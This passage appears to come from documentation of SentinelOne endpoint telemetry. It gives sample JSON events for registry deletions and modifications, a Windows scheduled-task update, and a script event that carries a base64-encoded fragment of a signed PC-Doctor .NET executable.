"sessionId": 15, - "integrityLevel": "HIGH", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "D1A7307582B51DFF" - } - }, - "counters": { - "moduleLoad": 52 - } - } - } - ``` - - - -=== "reg_value_delete" - - - ```json - { - "meta": { - "seqId": 43, - "uuid": "19f22913365942f2afeed1463c96104b", - "traceId": "63014A4A2D8B42148CBD53DA4C5937A8", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM11", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785105794" - }, - "event_type": "regValueDelete", - "trueContext": { - "key": { - "value": "6508114A467ECCA8" - } - }, - "regValue": { - "key": {}, - "path": "MACHINE\\SYSTEM\\ControlSet001\\Services\\SentinelDeviceControl\\Enum\\53" - }, - "source": { - "node": { - "key": { - "value": "1BA4624EB033A7CC" - } - }, - "executable": { - "node": { - "key": { - "value": "AC786EF3445E33CE" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\ntoskrnl.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "10848576", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "560b6a3b55112d9834e28def41d5ac3de0e03928" - } - }, - "fullPid": { - "pid": 4, - "startTime": { - "millisecondsSinceEpoch": "1631781067519" - } - }, - "user": { - "name": "SYSTEM" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "1BA4624EB033A7CC" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "NT Kernel & System", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6508114A467ECCA8" - } - }, - 
"counters": { - "modelChildProcess": 2, - "osChildProcess": 2, - "fileModification": 1, - "netConnIn": 16, - "netConnOut": 26 - } - } - } - ``` - - - -=== "reg_value_modified" - - - ```json - { - "meta": { - "seqId": 133, - "uuid": "4d311e18709146cba8797a22e3c20762", - "traceId": "8D9114CB762D473FAA5189BD13762FB2", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785156204" - }, - "event_type": "regValueModified", - "trueContext": { - "key": { - "value": "B3E0EF7ECFD0D296" - } - }, - "regValue": { - "key": {}, - "path": "MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e96c-e325-11ce-bfc1-08002be10318}\\0003\\GlobalSettings\\AnalogDigitalCapture\\Node000\\Chan001" - }, - "oldValueType": 1, - "newValueType": 3, - "source": { - "node": { - "key": { - "value": "645A938883C36D21" - } - }, - "executable": { - "node": { - "key": { - "value": "294CA423F5D3A1E5" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", - "fullPid": { - "pid": 3504, - "startTime": { - "millisecondsSinceEpoch": "1631625850355" - } - }, - "user": { - "name": "AUTORITE NT\\SERVICE LOCAL", - "sid": "S-1-5-19" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "DEF87C2AB48B84DC" - } - 
}, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "B3E0EF7ECFD0D296" - } - }, - "counters": { - "modelChildProcess": 25, - "osChildProcess": 25, - "moduleLoad": 87 - } - }, - "oldValueData": "00C0F0FF", - "newValueData": "0040EEFF" - } - ``` - - - -=== "sched_task_update" - - - ```json - { - "meta": { - "seqId": 63, - "uuid": "bcc4bf7a284441599707050e1d58a8dd", - "traceId": "CEBBC94D38B041B1B2DE01C315EB28F5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH15", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634708620" - }, - "event_type": "schedTaskUpdate", - "trueContext": { - "key": { - "value": "4FE2F2ADB5655DDF" - } - }, - "taskName": "\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Maintenance Work", - "source": { - "node": { - "key": { - "value": "38F2355042BA2367" - } - }, - "executable": { - "node": { - "key": { - "value": "99892497510C239E" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\MoUsoCoreWorker.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "1614848", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "a5a6716e38b06d44f4803b5167db2a0862b1d6bf", - "sha256": "a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d", - "md5": "475c5e07f8375dab6e5888301b1705e6" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\Windows\\System32\\mousocoreworker.exe -Embedding", - "fullPid": { - "pid": 8588, - "startTime": { - "millisecondsSinceEpoch": "1631289768083" - } 
- }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "B485A24CFF4A8D31" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "MoUSO Core Worker Process", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "4FE2F2ADB5655DDF" - } - }, - "counters": { - "modelChildProcess": 1, - "osChildProcess": 1, - "moduleLoad": 1158, - "netConnOut": 7, - "dnsLookups": 1 - } - } - } - ``` - - - -=== "script" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFQFVBJWAT35E5D075MQ1408", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631802162798" - }, - "event_type": "scripts", - "source": { - "node": { - "key": { - "value": "35A565744E7A266A" - } - }, - "executable": { - "node": { - "key": { - "value": "FBFFF74AA755328C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "5518152", - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC.", - "valid": {} - } - }, - "hashes": { - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa", - "md5": "423050654da76dab9c2866ba3c13ce38" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe\" /child", - "fullPid": { - "pid": 14832, - "startTime": { - "millisecondsSinceEpoch": "1631802162671" - } - }, - "user": { - "name": 
"CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "04DEDAAF23E16398" - } - }, - "executable": { - "node": { - "key": { - "value": "DED9F9357E5C5C30" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1631802160011" - }, - "path": "C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "5518152", - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC.", - "valid": {} - } - }, - "hashes": { - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa", - "md5": "423050654da76dab9c2866ba3c13ce38" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe\" /NA /noui", - "fullPid": { - "pid": 1780, - "startTime": { - "millisecondsSinceEpoch": "1631802161886" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "EDA8D6AB348AAE7D" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": " ", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "HIGH", - "isWow64": "E_TRUE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B21DD2505AAA5F2" - } - }, - "counters": { - "modelChildProcess": 1, - "osChildProcess": 1, - "crossProcess": 2, - "moduleLoad": 237, - "fileCreation": 1, - "fileDeletion": 1, - "fileModification": 32, - "exeModification": 3, - "netConnOut": 2, - "registryModification": 3, - "crossProcessDupProcessHandle": 2 - } - }, - "excluded": "E_FALSE", - "name": " ", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "HIGH", - "isWow64": "E_TRUE", - 
"isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B21DD2505AAA5F2" - } - }, - "counters": { - "moduleLoad": 224, - "fileCreation": 3, - "fileDeletion": 3, - "fileModification": 33, - "netConnOut": 3, - "registryModification": 1, - "dnsLookups": 1 - } - }, - "targetFile": { - "node": { - "key": {} - }, - "creationTime": {}, - "owner": {}, - "hashes": {} - }, - "content": "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAHrlVoAAAAAAAAAAOAAAiELAQsAAFIJAAAGAAAAAAAArnAJAAAgAAAAgAkAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADACQAAAgAABpAJAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAFhwCQBTAAAAAIAJAPADAAAAAAAAAAAAAAAAAAAAAAAAAKAJAAwAAAAgbwkAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtFAJAAAgAAAAUgkAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPADAAAAgAkAAAQAAABUCQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAJAAACAAAAWAkAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACQcAkAAAAAAEgAAAACAAUArMMDAHSrBQAJAAAAAAAAAAC5AgCqCgEAUCAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKPmM4JO3Mb/Yr8xUvErRsLDKFCmAeWnxv34cbrBeIhquh6sB88aKJVBwDUXWxASvilkHMxmu11yHuNiBDmydsbuvmlJtc1CW6klksNQXciZxOVDutsCEGKXidvB4wUHAT0R/AXDbzWzvvAeFwSyX1a4S1EedjLyMsLWX99UcjIuHgIoJAAACioeAigkAAAKKjoCKCQAAAoCAygFAAAGKh4CewEAAAQqIgIDfQEAAAQqHgIoJAAACioeAigkAAAKKjoCKCQAAAoCAygKAAAGKh4CewIAAAQqIgIDfQIAAAQqJgIDFigMAAAGKlYCKCQAAAoCAygOAAAGAgQoEAAABioeAnsDAAAEKiICA30DAAAEKh4CewQAAAQqIgIDfQQAAAQqIgIXKBIAAAYqOgIoJAAACgIDKBQAAAYqHgJ7BQAABCoiAgN9BQAABCoeAigkAAAKKjoCKCQAAAoCAygYAAAGKh4CewYAAAQqIgIDfQYAAAQqJgIdFygcAAAGKiYCAxcoHAAABiomAh0DKBwAAAYqVgIoJAAACgIDKB4AAAYCBCggAAAGKh4CewcAAAQqIgIDfQcAAAQqHgJ7CAAABCoiAgN9CAAABComAh0XKCQAAAYqJgIDFygkAAAGKiYCHQMoJAAABipWAigkAAAKAgMoJgAABgIEKCgAAAYqHgJ7CQAABCoiAgN9CQAABCoeAnsKAAAEKiICA30KAAAEKh4CKCQAAAoqOgIoJAAACgIDKCwAAAYqHgJ7FgAABCoiAgN9FgAABCoeAigkAAAKKh4CKCQAAAoqHg
IoJAAACio6AigkAAAKAgMoMgAABioeAnsXAAAEKiICA30XAAAEKh4CKCQAAAoqOgIoJAAACgIDKDYAAAYqHgJ7GAAABCoiAgN9GAAABCoeAigvAAAGKjoCKC8AAAYCAyg6AAAGKh4CexkAAAQqIgIDfRkAAAQqHgIoJAAACio6AigkAAAKAgMoPgAABioeAnsaAAAEKiICA30aAAAEKh4CKCQAAAoqHgIoJAAACioeAigvAAAGKh4CKCQAAAoqHgIoJAAACioeAigkAAAKKh4CKCQAAAoqHgIoLwAABioeAigkAAAKKh4CKCQAAAoqOgIoJAAACgIDKEsAAAYqHgJ7GwAABCoiAgN9GwAABCo6AigkAAAKAgMoTgAABioeAnscAAAEKiICA30cAAAEKh4CKCQAAAoqHgIoJwAACioAAzADAEwAAAAAAAAAAywNAnsoAAAKA29RAAAGKgJ7KQAACm8qAAAKLQ0CeygAAAoUb1EAAAYqAnsrAAAKAnspAAAKbywAAAoCey0AAAooWgAABm8uAAAKKhMwAwBXAAAAAQAAEXMvAAAKCgYDfTAAAAoGBH0xAAAKBgZ7MQAACigBAAArfTEAAAoGFH0yAAAKBgJvMwAACn00AAAKBgb+BjUAAApzUAAABn0yAAAKBnsyAAAKFG9RAAAGKh4CKCcAAAoqABMwAwBIAAAAAgAAEQMsDQJ72gQABANvUQAABioCJXvZBAAEJQoXWX3ZBAAEBhYwDQJ72gQABBRvUQAABioCe9sEAAQCe9gEAAQoWgAABm9fAAAGKhMwAwBSAAAAAwAAEXNLEAAGCgYDfdoEAAQGBH3bBAAEBgZ72wQABChcAAAGfdsEAAQGFH3YBAAEBgJ92QQABAYG/gZMEAAGc1AAAAZ92AQABAZ72AQABBRvUQAABioeAignAAAKKp4DLA0Ce9wEAAQDb1EAAAYqAnvdBAAEAnvcBAAEKFoAAAZvXwAABioAABMwAgA0AAAABAAAEXNNEAAGCwcCfdwEAAQHA33dBAAEBwd73QQABChcAAAGfd0EAAQH/gZOEAAGc1AAAAYKBipOAgNzGAYABv4GGQYABnNQAAAGKh4CKCcAAAoqHgIoJwAACiobMAIAaAAAAAUAABFyAQAAcAMoAgAAKwMsKRYLAns2AAAKJQwSASg3AAAKAns2AAAKA284AAAK3goHLAYIKDkAAArcAnw6AAAKKDsAAAoKcjUAAHAGKAMAACsGLRYCezwAAAoCezYAAAooWwAABm9RAAAGKgEQAAACABAAHS0ACgAAAAAbMAMAQQAAAAYAABECez0AAAp7PgAACgJ7PwAACgJ7PQAACntAAAAKKFoAAAZvLgAACt4YCgZyjwAAcCi/AAAGBig/BAAGLAL+Gt4AKgAAAAEQAAAAAAAAKCgAGAYAAAEbMAMAzAAAAAcAABFzQQAACg0JA31CAAAKCQR9QwAACgkJe0MAAAooAQAAK31DAAAKAnNEAAAKCgkGb0UAAAp9RgAACglzRwAACn1IAAAKcucAAHAGb0UAAAooAwAAKwl7RgAACi0NCXtCAAAKFG9RAAAGKgkJ/gZJAAAKc1AAAAZ9SgAACgZvSwAAChMEKy4SBChMAAAKC3NNAAAKDAgJfU4AAAoIB31PAAAKCP4GUAAACnNRAAAKKFIAAAomEgQoUwAACi3J3g4SBP4WIwAAG28DAAAK3CoBEAAAAgCCADu9AA4AAAAAHgIoJwAACipSAgN95gQABAJ75QQABG9UAAAKJioAAAATMAMAVgAAAAgAABFzUxAABgoGFnNVAAAKfeUEAAQGFH3mBAAEAgb+BlQQAAZzUAAABihaAAAGb18AAAYGe+UEAARvVgAACiYGe+YEAAQsEXIrAQBwBnvmBAAEc10MAAZ6KoYCb1cAAAp1uAAAAiwCAioCc9MFAAb+BtQFAAZzUAAABiobMAIAhgAAAAkAABECb1gAAAotAhQqAm9YAAAKFzMIAh
ZvWQAACipzWgAACgp+WwAACgsoOgQABgwCb1wAAAoTBCsnEQRvXQAACg0GB29eAAAKJgYJb18AAApvXgAACiYGCG9eAAAKJggLEQRvKgAACi3Q3gwRBCwHEQRvAwAACtxydQEAcAYoYAAACnNbDAAGKgAAARAAAAIANQA0aQAMAAAAAB4CKCcAAAoqGzACACMAAAAGAAARAnvnBAAEA29fAAAG3hQKBig+BAAGLAL+GgMGb1EAAAbeACoAARAAAAAAAAAODgAUBgAAARMwAgAaAAAACgAAEXNVEAAGCgYCfecEAAQG/gZWEAAGc14AAAYqHgIoJwAACioAABswAwAkAAAABgAAEQJ7YQAACgMEby4AAAreFAoGKD4EAAYsAv4aBAZvUQAABt4AKgEQAAAAAAAADw8AFAYAAAETMAIAGgAAAAsAABFzYgAACgoGAn1jAAAKBv4GZAAACnNlAAAKKloC/hUmAAACAgMoaAAABgIEKGoAAAYqHgJ7HQAABCoiAgN9HQAABCoeAnseAAAEKiICA30eAAAEKq4PAChpAAAGDwEoaQAABihnAAAKLBQPAChnAAAGDwEoZwAABihnAAAKKhYqug8AKGkAAAYPAShpAAAGKGcAAAosFw8AKGcAAAYPAShnAAAGKGcAAAoW/gEqFyoAABMwAgAUAAAADAAAEQOlJgAAAgoCcSYAAAIGKGsAAAYqYgIoZwAABm9oAAAKAihpAAAGb2gAAAphKlpzJwAACoAfAAAEFoAhAAAEKHAAAAYqAzADAJ0AAAAAAAAAcqsBAHBy3wEAcBYoBAAAKyh0AAAGchkCAHByVwIAcBYoBAAAKyh2AAAGcp0CAHByyQIAcH73AgAEKIsAAAYocgAABnL5AgBwciMDAHB+WwAACigFAAArKHoAAAZyUQMAcHKBAwBwFigEAAArKHgAAAZytwMAcHL5AwBwFygEAAArKH4AAAZyOQQAcCinAAAGFoAhAAAEFCh8AAAGKhp+IgAABCoeAoAiAAAEKhp+IwAABCoeAoAjAAAEKhp+JAAABCoeAoAkAAAEKhp+JQAABCoeAoAlAAAEKhp+IAAABCp2AoAgAAAEfiAAAAQoaQAACi0KfiAAAAQojQAABioafiYAAAQqHgKAJgAABCoaficAAAQqHgKAJwAABCoqFAIDBCiFAAAGKioUAgMUKIUAAAYqcgIocQAABigmCwAGLA4UAgNvagAAChQohQAABipyAyhxAAAGKCYLAAYsDgIDBG9qAAAKFCiFAAAGKioCAwQFKIUAAAYqKgIDBBQohQAABioAABswBACmAQAADQAAEQIohgAABiwBKgMohwAABi0BKgQKBSwNKGsAAAoEBShsAAAKCgRvbQAACh8gWHNuAAAKCyh9AAAGLDAHKDMQAAZvMhAABhMLEgtyfQQAcChrAAAKKG8AAApvXgAACiYHcq8EAHBvXgAACiYHA29wAAAKJgdyrwQAcG9eAAAKJgcGb14AAAomAiwaAig8BAAGB3KzBABwb14AAAomBwJvcAAACiYHb18AAAoMKHkAAAYNCShpAAAKLT4WEwV+HwAABCUTDBIFKDcAAAoJKHEAAAoTBBEECG9yAAAK3gwRBCwHEQRvAwAACtzeDBEFLAcRDCg5AAAK3Ch7AAAGEwYRBiwoFhMHfh8AAAQlEw0SByg3AAAKEQYIb3IAAAreDBEHLAcRDSg5AAAK3ChzAAAGLCYWEwh+HwAABCUTDhIIKDcAAAoIKHMAAAreDBEILAcRDig5AAAK3Ch1AAAGLCsWEwl+HwAABCUTDxIJKDcAAAoodAAACghvcgAACt4MEQksBxEPKDkAAArcCCiIAAAG3hUTCheAIQAABBEKKD8EAAYsAv4a3gAqAABBlAAAAgAAANIAAAAKAAAA3AAAAAwAAAAAAAAAAgAAALsAAAAvAAAA6gAAAAwAAAAAAAAAAgAAAAQBAAAZAAAAHQEAAAwAAAAAAAAAAgAAAD
+UAAAKLAcCKFQCAAYqFioeAiheAgAGKh4Ce9IAAAQqIgIDfdIAAAQqHgJ70wAABCoiAgN90wAABCoAABMwAwAzAAAAdwAAEQIobwIABi0DGisBGwoCKF8CAAYDb0gIAAYLBwIobQIABgZvlQAAChYvBwIoVAIABioWKh4CKF4CAAYqHgIoXgIABioeAnvUAAAEKiICA33UAAAEKh4Ce9UAAAQqIgIDfdUAAAQqAAAAEzADADAAAAB2AAARAih2AgAGLQMaKwEbCgIoXwIABgNvSAgABgIodAIABgZvlAAACi0HAihUAgAGKhYqIgIDKIACAAYqMn71AgAEAiiAAgAGKjJ+9gIABAIogAIABioyfvcCAAQCKIACAAYqMn74AgAEAiiAAgAGKjJ++QIABAIogAIABioyfvoCAAQCKIACAAYqABMwAwBAAAAAeAAAEQMlLQYmflsAAAoovAEACgoGKL0BAAotCAYoSAsABisFftYAAAQLBwJzgwIABgwDLA0IcqkuAHADb48CAAYmCCouKEMLAAaA1gAABCo2AgN+9gIABCiDAgAGKgAAEzADAGAAAAB5AAARAignAAAKAy0LclsGAHBzIAEACnoEFCgjCwAGLAtyxy4AcHMgAQAKegIDfdgAAAQCc9QIAAYKBgRv3QgABgYDb7ACAAZv5wgABgYoMxAABm8yEAAGb9sIAAYGfdcAAAQqHgJ71wAABCo6AnvXAAAEA2/lCAAGAiqKAxQoIwsABiwLcscuAHBzIAEACnoCe9cAAAQDb90IAAYCKjoCe9cAAAQDb+cIAAYCKjoCe9cAAAQDb+oIAAYCKhMwBAAlAAAAEwAAEQJ71wAABANv6ggABgJ71wAABBeNBAAAAQoGFgSiBm/sCAAGAioAAAATMAQAKQAAABMAABECe9cAAAQDb+oIAAYCe9cAAAQYjQQAAAEKBhYEogYXBaIGb+wIAAYCKgAAABMwBAAuAAAAEwAAEQJ71wAABANv6ggABgJ71wAABBmNBAAAAQoGFgSiBhcFogYYDgSiBm/sCAAGAioAABMwBAAzAAAAEwAAEQJ71wAABANv6ggABgJ71wAABBqNBAAAAQoGFgSiBhcFogYYDgSiBhkOBaIGb+wIAAYCKmoCe9cAAAQDb+oIAAYCe9cAAAQEb+wIAAYCKpoCe9cAAAQDb+4IAAYCe9cAAAQEb+oIAAYCe9cAAAQFb+wIAAYCKooDLQtyrhYAcHMgAQAKegJ71wAABG/xCAAGAwRvvgEACgIqGzAEAFgAAAB6AAARAy0LctkuAHBzIAEACnoDb78BAApvAgAACgsrHwdvBQAACgoCe9cAAARv8QgABgYDBm/AAQAKb74BAAoHbyoAAAot2d4RB3UKAAABDAgsBghvAwAACtwCKgEQAAACABoAK0UAEQAAAAA6AnvXAAAEA2/bCAAGAio+AnvXAAAEAwRv/AgABgIqAAMwAwBHAAAAAAAAAAMsDQJy7y4AcAMojwIABiYELA0CcqkuAHAEKI8CAAYmBSwSAnIRLwBwBYzQAAABKI8CAAYmAnvYAAAEAnvXAAAEb7MCAAYqAAMwAwBVAAAAAAAAAAMsCANvwQEACi0BKgQsDQJy7y4AcAQojwIABiYFLA0CcqkuAHAFKI8CAAYmDgQsEwJyES8AcA4EjNAAAAEojwIABiYCe9gAAAQCe9cAAARvswIABioAAAADMAMATQAAAAAAAAADLQEqBCwNAnLvLgBwBCiPAgAGJgUsDQJyqS4AcAUojwIABiYOBCwTAnIRLwBwDgSM0AAAASiPAgAGJgJ72AAABAJ71wAABG+zAgAGKgAAABMwAgAKAAAAewAAEQIDc4MCAAYKBioAABMwAgAOAAAAewAAEQJ+9QIABHODAgAGCgYqAAATMAIADgAAAHsAABECfvYCAARzgwIABgoGKgAAEzACAA4AAAB7AAARAn73AgAEc4MCAAYKBioAABMwAgAOAAAAewAAEQ
J++AIABHODAgAGCgYqAAATMAIADgAAAHsAABECfvkCAARzgwIABgoGKgAAEzACAA4AAAB7AAARAn76AgAEc4MCAAYKBioiAgMopAI=", - "contentHash": { - "sha256": "2d12874ce5eff797003e69815c70c9dce5876e4062e3162c3bad65d20831d5cb" - }, - "originalSize": "612864", - "appName": "DotNet", - "decodedContent": "\u5a4d\u0090\u0003\u0000\u0004\u0000\uffff\u0000\u00b8\u0000\u0000\u0000@\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0080\u0000\u1f0e\u0eba\ub400\ucd09\ub821\u4c01\u21cd\u6854\u7369\u7020\u6f72\u7267\u6d61\u6320\u6e61\u6f6e\u2074\u6562\u7220\u6e75\u6920\u206e\u4f44\u2053\u6f6d\u6564\u0d2e\u0a0d$\u0000\u0000\u0000\u4550\u0000\u014c\u0003\ueb01\u5a95\u0000\u0000\u0000\u0000\u00e0\u2102\u010b\u000b\u5200\t\u0600\u0000\u0000\u0000\u70ae\t\u2000\u0000\u8000\t\u0000\u1000\u2000\u0000\u0200\u0000\u0004\u0000\u0000\u0000\u0006\u0000\u0000\u0000\uc000\t\u0200\u0000\u9006\t\u0003\u8560\u0000\u0010\u1000\u0000\u0000\u0010\u1000\u0000\u0000\u0000\u0010\u0000\u0000\u0000\u0000\u0000\u7058\tS\u0000\u8000\t\u03f0\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ua000\t\f\u0000\u6f20\t\u001c\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u2000\u0000\b\u0000\u0000\u0000\u0000\u0000\u2008\u0000H\u0000\u0000\u0000\u0000\u0000\u742e\u7865t\u0000\u50b4\t\u2000\u0000\u5200\t\u0200\u0000\u0000\u0000\u0000\u0000\u0000\u0000 
\u6000\u722e\u7273c\u0000\u03f0\u0000\u8000\t\u0400\u0000\u5400\t\u0000\u0000\u0000\u0000\u0000\u0000@\u4000\u722e\u6c65\u636f\u0000\f\u0000\ua000\t\u0200\u0000\u5800\t\u0000\u0000\u0000\u0000\u0000\u0000@\u4200\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u7090\t\u0000\u0000H\u0000\u0002\u0005\uc3ac\u0003\uab74\u0005\t\u0000\u0000\u0000\ub900\u0002\u0aaa\u0001\u2050\u0000\u0080\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ue6a3\u8233\ufffd\uffc6\ubf62\u5231\u2bf1\uc246\u28c3\ua650\ue501\uc6a7\uf8fd\uba71\u78c1\u6a88\u1eba\u07ac\u1acf\u9528\uc041\u1735\u105b\ube12\u6429\ucc1c\ubb66\u725d\ue31e\u0462\ub239\uc676\ubeee\u4969\ucdb5\u5b42\u25a9\uc392\u5d50\u99c8\ue5c4\uba43\u02db\u6210\u8997\uc1db\u05e3\u0107\u113d\u05fc\u6fc3\ub335\uf0be\u171e\ub204\u565f\u4bb8\u1e51\u3276\u32f2\ud6c2\ufffd\u7254\u2e32\u021e\u2428\u0000\u2a0a\u021e\u2428\u0000\u2a0a\u023a\u2428\u0000\u020a\u2803\u0005\u0600\u1e2a\u7b02\u0001\u0400\u222a\u0302\u017d\u0000\u2a04\u021e\u2428\u0000\u2a0a\u021e\u2428\u0000\u2a0a\u023a\u2428\u0000\u020a\u2803\n\u0600\u1e2a\u7b02\u0002\u0400\u222a\u0302\u027d\u0000\u2a04\u0226\u1603\u0c28\u0000\u2a06\u0256\u2428\u0000\u020a\u2803\u000e\u0600\u0402\u1028\u0000\u2a06\u021e\u037b\u0000\u2a04\u0222\u7d03\u0003\u0400\u1e2a\u7b02\u0004\u0400\u222a\u0302\u047d\u0000\u2a04\u0222\u2817\u0012\u0600\u3a2a\u2802$\u0a00\u0302\u1428\u0000\u2a06\u021e\u057b\u0000\u2a04\u0222\u7d03\u0005\u0400\u1e2a\u2802$\u0a00\u3a2a\u2802$\u0a00\u0302\u1828\u0000\u2a06\u021e\u067b\u0000\u2a04\u0222\u7d03\u0006\u0400\u262a\u1d02\u2817\u001c\u0600\u262a\u0302\u2817\u001c\u0600\u262a\u1d02\u2803\u001c\u0600\u562a\u2802$\u0a00\u0302\u1e28\u0000\u0206\u2804 
